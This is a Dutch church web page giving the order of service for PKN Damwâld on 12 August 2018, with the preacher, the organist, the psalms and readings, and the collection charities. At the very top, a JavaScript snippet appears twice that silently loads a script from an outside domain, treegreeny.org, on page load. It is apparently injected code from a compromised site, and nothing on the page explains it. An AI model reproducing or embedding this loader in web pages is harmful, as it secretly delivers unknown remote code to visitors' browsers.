;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 12 augustus 2018 9:30 uur - PKN Damwâld
zondag 12 augustus 2018
09:30 uur

Kerkdienst zondag 12 augustus 2018 9:30 uur

Informatie

Voorganger:Mw. R. van der Wal-Van Akker, Morra
Organist:Jaap van der Horn
Liturgie
Lied voor de dienst gezang 459 : 1, 2, 5, 7 en 8
Welkom
Intochtslied Psalm 1 : 1 en 2
- Stil gebed – Woord van verwachting
We zingen: Psalm 65 het 1e en 2e vers
Gebed voor het openen van de Schriften
Samenvatting van de wet .
We zingen: Psalm 105 vers 1
We lezen: Hebr. 11 : 13 t/m 16 en Hebr. 13, 8 t/m 14
We zingen: Psalm 105 vers 5
Verkondiging .
We zingen: gezang 290: 1, 2, 3 en 5
Dankgebed en voorbede
Collecte
Slotlied : ELB 413
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Collecte informatie
Eerste collecte: Stichting Ora

Sinds de oprichting in 1982 is de visie van de Stichting ORA om mensen in nood wereldwijd te ondersteunen met geestelijke, sociale, materiële en praktische hulp, met als kerntaak hulp aan gezinnen in Oost-Europa, Azië en Afrika. In principe helpt de Stichting ORA mensen ongeacht hun ras, sekse of geloof, maar wanneer Christenen om hun geloofsovertuiging worden vervolgd zal de Stichting ORA hen in het bijzonder ondersteunen.

Tweede collecte: Kerk
Uitganscollecte: Kerk